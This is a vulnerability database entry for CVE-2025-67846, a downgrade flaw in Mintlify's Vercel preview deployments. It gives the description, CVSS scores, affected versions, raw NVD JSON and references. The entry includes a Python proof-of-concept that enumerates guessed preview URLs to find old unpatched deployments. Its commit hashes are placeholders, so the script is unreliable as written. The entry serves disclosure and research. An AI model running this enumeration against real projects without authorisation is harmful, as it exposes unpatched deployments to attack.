Security Vulnerability Report
中文
CVE-2025-67846 CVSS 4.9 MEDIUM

CVE-2025-67846

Published: 2025-12-19 02:16:09
Last Modified: 2026-01-02 15:46:16
Source: [email protected]

Description

The Deployment Infrastructure in Mintlify Platform before 2025-11-15 allows remote attackers to bypass security patches and execute downgrade attacks via predictable deployment identifiers on the Vercel preview domain. An attacker can identify the URL structure of a previous deployment that contains unpatched vulnerabilities. By browsing directly to the specific git-ref or deployment-id subdomain, the attacker can force the application to load the vulnerable version.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:mintlify:mintlify:*:*:*:*:*:*:*:* - VULNERABLE
Mintlify Platform < 2025-11-15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67846 Mintlify Platform Downgrade Attack PoC # This PoC demonstrates how to access old vulnerable deployments import requests import itertools import sys def generate_deployment_urls(base_project, git_refs): """ Generate potential deployment URLs based on predictable patterns """ urls = [] for ref in git_refs: # Vercel preview deployment URL pattern url = f"https://{base_project}-{ref}.vercel.app" urls.append(url) # Alternative pattern with deployment ID url2 = f"https://{ref}-{base_project}.vercel.app" urls.append(url2) return urls def check_deployment_access(url): """ Check if a deployment URL is accessible and returns valid content """ try: response = requests.get(url, timeout=10, allow_redirects=True) if response.status_code == 200: return True, response return False, None except requests.RequestException: return False, None def exploit_mintlify_downgrade(base_project, target_date): """ Main exploitation function for CVE-2025-67846 Args: base_project: The Mintlify project name target_date: Target date to find vulnerable deployment (e.g., '2025-10-01') """ print(f"[*] Starting downgrade attack on {base_project}") print(f"[*] Looking for deployments before {target_date}") # Common git ref patterns to enumerate git_refs = [ f"main-{target_date}", f"master-{target_date}", f"develop-{target_date}", f"release-{target_date}", f"v1.0.0-{target_date}", # Try variations with commit hashes "abc1234", "def5678", "9f1a2b3c" ] urls = generate_deployment_urls(base_project, git_refs) for url in urls: accessible, response = check_deployment_access(url) if accessible: print(f"[+] Found accessible deployment: {url}") print(f"[+] Status: {response.status_code}") print(f"[*] This deployment may contain unpatched vulnerabilities") return url print("[-] No accessible old deployments found") return None if __name__ == "__main__": # Example usage project = "your-mintlify-project" target = "2025-10-15" # Before the security patch (2025-11-15) exploit_mintlify_downgrade(project, target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67846", "sourceIdentifier": "[email protected]", "published": "2025-12-19T02:16:09.483", "lastModified": "2026-01-02T15:46:16.390", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["exclusively-hosted-service"]}], "descriptions": [{"lang": "en", "value": "The Deployment Infrastructure in Mintlify Platform before 2025-11-15 allows remote attackers to bypass security patches and execute downgrade attacks via predictable deployment identifiers on the Vercel preview domain. An attacker can identify the URL structure of a previous deployment that contains unpatched vulnerabilities. By browsing directly to the specific git-ref or deployment-id subdomain, the attacker can force the application to load the vulnerable version."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-472"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mintlify:mintlify:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025-11-15", "matchCriteriaId": "4E599124-4B00-4D5C-ADB5-EC4564D3E5BF"}]}]}], "references": [{"url": "https://kibty.town/blog/mintlify/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://news.ycombinator.com/item?id=46317098", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://www.mintlify.com/blog/working-with-security-researchers-november-2025", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mintlify.com/docs/changelog", "source": "[email protected]", "tags": ["Release Notes"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.